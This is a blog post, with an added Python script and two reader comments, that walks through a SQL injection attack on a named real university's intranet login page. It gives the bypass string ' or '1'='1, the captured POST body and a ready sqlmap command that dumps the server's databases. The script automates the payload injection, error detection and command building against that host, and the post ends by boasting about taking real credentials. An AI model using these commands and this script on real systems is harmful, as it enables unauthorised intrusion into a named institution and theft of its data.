Friday, May 31, 2013

[Sqlmap] SQL Injection using POST method

In this short and simple post I will walk through the steps we take when we need to exploit a SQL injection vulnerability, mostly on applications backed by SQL Server or Oracle. These vulnerabilities are typical of administrative LOGIN pages because, as we know, the username and password are sent with the POST method, so there is a chance that submitting false data or a bypass string will make the server show an error that lets us identify an exploitable vulnerability. sqlmap can then automate the exploitation, with options that send the request via POST rather than via GET as is "usual".

If I have not explained it well, a word to the wise is enough! So, without further ado, let's get to work!

We have an ASP LOGIN page for which we have no valid credentials or anything of the sort, since we have not found any vulnerability on the server that would give us that data. Being curious and clever, we start by testing false data and some bypass strings, such as the well-known ' or '1'='1, as shown in the following image:

After submitting this bypass, the server may show us an error or bug that lets us confirm whether it is vulnerable to SQL injection. If the server runs ASP, it may return the error "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'"; that code is the database driver's syntax error, which means our quote reached the SQL statement unescaped, so if this happens we are in luck, because the vulnerability can be exploited. In this case, after submitting the bypass, the server returned the following error:


Having seen this vulnerability, we know it can be exploited manually or with an automated process to obtain data that lets us log in to the server properly.

Now, to keep testing whether the login has some other type of vulnerability, we go back to the form, leave the username and password blank and click Connect, to which the server responds with the following:


Something odd, right? Why? ... This LOGIN shows that requests are not validated: if we enter a bypass string it reveals a vulnerability, and if we leave the form blank and click Connect it lets us skip the login altogether.

Well, having drawn the small conclusions that the server has a vulnerability in the login and that requests are not validated, we will use Live HTTP Headers to see the headers sent at the moment we click Connect on the login.

After setting Live HTTP Headers to listen to what happens when we click Connect with all the fields left blank, it returns the following:


We have obtained three important pieces of data, which are:

  • http://www.uap.edu.pe/intranet/logon2.asp
  • POST /intranet/logon2.asp HTTP/1.1
  • user=&pw=&user=07&B7=++Connect++

The first is probably the vulnerable URL, the second shows that the request is sent with POST, and the last holds the form parameters that are probably vulnerable (note that the form sends the "user" field twice).

We then proceed to exploit the vulnerability found in the LOGIN automatically, using sqlmap and running the following command built from the data collected with Live HTTP Headers:

  • ./sqlmap.py -u "http://www.uap.edu.pe/intranet/logon2.asp" --data="user=&pw=&user=07&B7=++Connect++" -p "user" --level=5 --risk=5 --dbs
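As an added example (this is not code from the original post), the Python script below does the two mechanical steps of the procedure above offline: it parses a Live HTTP Headers capture into the URL, method and POST body, puts the ' or '1'='1 bypass into the chosen field, checks a response for the '80040e14' error text, and rebuilds the sqlmap command line from the capture. The host, the /intranet/logon2.asp path, the POST body and the error text come from the post; the header lines of the capture, the HTML shape of the error page, the sample responses and the helper names are assumptions.

```python
"""Added example (not part of the original post): rebuild the sqlmap command
from a Live HTTP Headers capture and check a login response for the ODBC
error the post uses as its injection indicator.

From the post: host, /intranet/logon2.asp, the captured POST body and the
'80040e14' error text. Assumed: the exact header lines of the capture, the
HTML of the error page and the helper names below.
"""
import re
import shlex
from urllib.parse import parse_qsl, urlencode

# Constructed capture, shaped like what Live HTTP Headers shows when the
# login form is submitted with both fields left blank.
CAPTURE = (
    "POST /intranet/logon2.asp HTTP/1.1\r\n"
    "Host: www.uap.edu.pe\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 32\r\n"
    "\r\n"
    "user=&pw=&user=07&B7=++Connect++"
)

# Classic ASP splits this message across separate <font> tags, so the check
# below runs on tag-stripped text rather than on the raw HTML.
ODBC_ERROR = "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'"


def parse_capture(raw):
    """Split a captured request into method, absolute URL and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _version = request_line.split()
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Assumes plain http, as in the post's URL.
    return {"method": method, "url": "http://" + headers["host"] + path,
            "body": body.strip()}


def inject(body, param, payload):
    """Return the form body with `payload` in every field named `param`.

    The captured body sends `user` twice; both copies get the payload so the
    request keeps the exact field layout the server expects.
    """
    fields = parse_qsl(body, keep_blank_values=True)
    return urlencode([(k, payload if k == param else v) for k, v in fields])


def looks_injectable(html):
    """True if the response carries the OLE DB/ODBC error from the post."""
    text = re.sub(r"<[^>]+>", " ", html)
    text = re.sub(r"\s+", " ", text)
    return ODBC_ERROR in text


def sqlmap_command(raw_capture, param, level=5, risk=5):
    """Build the sqlmap argv used in the post from the capture."""
    req = parse_capture(raw_capture)
    return ["python", "sqlmap.py", "-u", req["url"], "--data", req["body"],
            "-p", param, "--level", str(level), "--risk", str(risk), "--dbs"]


# Constructed responses, shaped like a classic ASP error page and a normal
# login page, used only to exercise looks_injectable() offline.
ERROR_PAGE = (
    '<font face="Arial" size=2>\n<p>Microsoft OLE DB Provider for ODBC Drivers'
    '</font> <font face="Arial" size=2>error \'80040e14\'</font>\n'
    '<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]'
    "Unclosed quotation mark before the character string ''.</font>"
)
NORMAL_PAGE = "<html><body><form>Intranet login</form></body></html>"

if __name__ == "__main__":
    body = parse_capture(CAPTURE)["body"]
    print(inject(body, "user", "' or '1'='1"))
    print(looks_injectable(ERROR_PAGE), looks_injectable(NORMAL_PAGE))
    print(shlex.join(sqlmap_command(CAPTURE, "user")))
```

Run it as-is to see the injected body and the rebuilt command; to use it against a real capture, paste the request text from Live HTTP Headers into CAPTURE and feed the server's response to looks_injectable(). The body is kept byte-for-byte as captured (including the duplicate "user" field and the "++Connect++" button value), because sqlmap needs to send the form exactly as the server expects it.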


After the tool has finished auditing the server, it reports that the POST parameter "user" is vulnerable, as shown in the following image:


From there we know that this LOGIN really is vulnerable, and we have exploited it, obtaining, to our full satisfaction, every database on the server.


Now, yes! With this DB we will get the real credentials and log in to the LOGIN page as we please ;)

I hope this is useful to you.

Greetings. 

2 comments:

Unknown said...

"SQL Injection" is a subset of the unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises. http://born2hack.hpage.com/sql-injection-attack_58594237.html

SQL injection test site said...

Thanks for providing complete information on SQL injection. I found screenshots helpful.